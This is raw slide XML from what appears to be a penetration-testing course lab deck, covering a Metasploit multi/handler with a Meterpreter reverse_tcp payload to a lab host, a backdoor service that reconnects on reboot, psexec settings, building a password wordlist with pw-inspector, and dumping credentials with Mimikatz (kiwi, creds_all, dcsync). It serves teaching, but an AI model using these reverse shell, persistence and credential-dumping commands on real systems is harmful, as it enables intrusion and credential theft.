            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msf6 exploit(multi/handler) &gt; </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set PAYLOAD windows/x64/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>/reverse_tcp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check your options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LPORT = 4444</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LHOST = 10.10.0.10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit but send to the background</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msf6 exploit(multi/handler) &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>exploit -j</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>It will listen for incoming connections!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68A975DE-F173-D947-A472-4E0B4CD3F66C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6321556" y="1135554"/>
            <a:ext cx="2397903" cy="2571304"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34FD9827-260A-7F40-B38B-96CC351DE075}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3894762" y="3920708"/>
            <a:ext cx="5121917" cy="956091"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2947412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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Close all current sessions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>sessions -K</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Check the current job</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>msf &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>jobs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can see that there are no more sessions but our multi-handler is listening...</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CFEDFAB-5FF0-C040-B8EB-3E3926325558}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="680816" y="2681501"/>
            <a:ext cx="4749800" cy="622300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA6FA47C-808B-5C44-B418-80047CE9BF4A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="680816" y="3460187"/>
            <a:ext cx="6400145" cy="1260225"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1187699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AED5CE-0A38-B542-B19E-AA15514D30DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="188162" y="1573007"/>
            <a:ext cx="4942497" cy="1032076"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We will use an existing password file as a seed for our new list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/usr/share/wordlists/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nmap.lst</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="688975" lvl="4" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Inspect the wordlist with cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can pipe it right into pw-inspector</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We can also use '-i' to read in a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use pw-inspector to print passwords</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>At least 6 characters long but no more than 10 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Uses at least 2 of the following three categories: lowercase, uppercase, numbers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create a new dictionary file called lab9.lst with the following rules</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Between 8-10 characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must use upper and lower case characters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Making a dictionary with pw-inspect</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{28DFE37A-9ECC-6449-8889-349E264D1908}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4955052" y="2193817"/>
            <a:ext cx="3962401" cy="1341638"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="19050">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1000134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r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>psexec settings</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="203075" y="830912"/>
            <a:ext cx="8572840" cy="3955095"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Power down and restart the VM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>If you are using your own Windows client, you could just manually start the service</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>Watch your metasploit console</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>As Windows starts back up, the service runs!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>The multi-handler gets the backdoor reverse_tcp connection request and successfully sends over the Meterpreter stage</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>We now have a new meterpreter session on a freshly booted Windows machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Our job ended </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68DB7F3B-D641-BE4E-81EF-0FD1EFBF93FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="257436" y="3248312"/>
            <a:ext cx="5396317" cy="1152312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EADA0FA1-CC2F-FE4A-857D-E1F5E0588F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5708552" y="3248312"/>
            <a:ext cx="3166263" cy="1152312"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1220779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Placeholder 2"/>
          <p:cNvPicPr>
            <a:picLocks/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:extLst>
              <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:srcRect r="51067"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="-3175" y="-1588"/>
            <a:ext cx="44831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Mimikatz &amp; Ophcrack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1279845696"/>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Metasploit - Meterpreter Getting Hashes </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Text Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="55421" y="766062"/>
            <a:ext cx="4866775" cy="1198925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>In the existing meterpreter session, load </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>Mikikatz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t>load kiwi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0" err="1"/>
              <a:t>creds_all</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:endParaRPr lang="en-US" sz="1050" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>We can see what other commands we can do with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="4"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>meterpreter &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="1" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="154169" y="2130506"/>
            <a:ext cx="4669277" cy="24314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800" b="1" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  Command                Description</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  -------                -----------</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creds_all</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              Retrieve all credentials (parsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creds_kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>         Retrieve Kerberos creds (parsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creds_msv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              Retrieve LM/NTLM creds (parsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creds_ssp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>              Retrieve SSP creds</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creds_tspkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            Retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>TsPkg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> creds (parsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>creds_wdigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>          Retrieve </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>WDigest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> creds (parsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dcsync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>                 Retrieve user account information via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (unparsed)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dcsync_ntlm</a:t>
            </a:r>
            <a:r>
